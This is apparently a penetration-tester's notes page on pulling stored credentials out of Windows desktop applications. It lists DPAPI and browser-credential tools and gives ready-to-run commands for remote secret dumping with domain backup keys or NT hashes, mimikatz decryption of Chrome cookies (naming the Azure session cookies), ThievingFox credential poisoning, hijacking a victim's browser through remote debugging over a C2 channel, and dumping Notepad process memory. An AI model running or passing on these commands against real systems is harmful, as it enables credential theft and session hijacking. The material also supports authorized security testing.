Application Credential Access

30.04.2024 ยท dadevel

The following tools can be used to access credentials from various Windows desktop applications. Many of them are protected by DPAPI.

Tool Language Access Supported Applications
DonPAPI Python Remote Credential Manager, Vault, Certificates, Internet Explorer, Chrome, Edge, Firefox, WiFi, VNC, mRemoteNG
dploot Python Remote Credential Manager, Vault, Certificates, Remote Desktop Connection Manager, Chrome, Edge, Firefox, WiFi
crackmapexec Python Remote Uses dploot
LaZagne Python Local Chrome, Edge, Firefox, Outlook, Thunderbird, FileZilla, KeePass, WinSCP and many more
SharpChromium C# Local Chome, Edge
ThunderFox C# Local Firefox, Thunderbird
offline_address_book_extractor.py Pyhton Offline Outlook address book parser
OutlookSpy C# Local Outlook
SessionGopher PowerShell Local WinSCP, PuTTY, FileZilla, RDP
strings2 + ProcessStringExtractor C + PowerShell Local generic, find patterns in process memory
PMP-Decrypter C# Local Patch My PC
dumpscan Python Remote Find certificates in Minidumps

Dump DPAPI-protected secrets remotely and decrypt them with the domain backup key, the users password or NT hash.

Worked, but crashed in the end.

donpapi -o ./ws01/dpapi -pvk ./corp.pvk -local_auth administrator:'passw0rd'@ws01.corp.local
donpapi -o ./ws01/dpapi -credz ./passwords.txt -local_auth administrator:'passw0rd'@ws01.corp.local
donpapi -o ./ws01/dpapi -credz ./nthashse.txt -local_auth administrator:'passw0rd'@ws01.corp.local

Failed during testing.

dploot triage -dump-all -export-triage ./ws01/dpapi -pvk ./corp.pvk -u administrator -p 'passw0rd' ws01.corp.local && dploot machinetriage -dump-all -export-triage ./ws01/dpapi -pvk ./corp.pvk -u administrator -p 'passw0rd' ws01.corp.local
dploot triage -dump-all -export-triage ./ws01/dpapi -passwords ./passwords.txt -u administrator -p 'passw0rd' ws01.corp.local && dploot machinetriage -dump-all -export-triage ./ws01/dpapi -passwords ./passwords.txt -u administrator -p 'passw0rd' ws01.corp.local
dploot triage -dump-all -export-triage ./ws01/dpapi -nthashes ./nthashes.txt -u administrator -p 'passw0rd' ws01.corp.local && dploot machinetriage -dump-all -export-triage ./ws01/dpapi -nthashes ./nthashes.txt -u administrator -p 'passw0rd' ws01.corp.local

As unprivileged user dump your own secrets, as local admin dump secrets from every user whose password is stored in CMEDB or as domain admin utilizing the domain backup keys. Uses dploot under the hood (source).

crackmapexec smb ws01.corp.local --local-auth -u administrator -p passw0rd --dpapi passwords && crackmapexec smb ws01.corp.local --local-auth -u administrator -p passw0rd --dpapi cookies

Dump Chrome cookies with Mimikatz. Cookies for Azure are ESTSAUTH, ESTSAUTHPERSISTENT and ESTSAUTHLIGHT.

mimikatz.exe "dpapi::chrome /in:%localappdata%googlechromeUSERDA~1defaultcookies /unprotect" exit

Dump credentials from various sources like KeePass, KeePassXC, mstsc, RDCMan and MobaXTerm with ThievingFox.

thievingfox poison --all corp.local/jdoeadm:'passw0rd'@ws01.corp.local
thievingfox collect --all corp.local/jdoeadm:'passw0rd'@ws01.corp.local
thievingfox cleanup --all corp.local/jdoeadm:'passw0rd'@ws01.corp.local

Untested tools:

  • pandora, dumps credentials from various password manager Chrome plugins like 1Password, Bitwarden and LastPass
  • hekatomb, dumps domain backup keys, downloads credential files from all domain computers, decrypts the files

References:

Chrome Remote Debugging

Start Chrome in headless and remote debugging mode.

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-debugging-address=127.0.0.1 --user-data-dir=%TEMP%\headless.profile --ignore-certificate-errors about:blank --headless
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-debugging-address=127.0.0.1 --user-data-dir=%TEMP%\headless.profile --ignore-certificate-errors about:blank --headless

Reverse forward the debug port over your C2.

Open Chrome on your machine and go to chrome://inspect. Now you can browse the web in the name of your victim.

Untested tools:

References:

Unsaved Notepad

Dump the content of an open notepad.exe window that is not written to a file (source):

rundll32.exe comsvcs.dll MiniDump %PID% .\notepad.log full
strings.exe --encoding=l .\notepad.log

References:

Notepad++ Backups

Inspect files in %USERPROFILE%\AppData\Roaming\Notepad++\backup.

ProtonPass

References: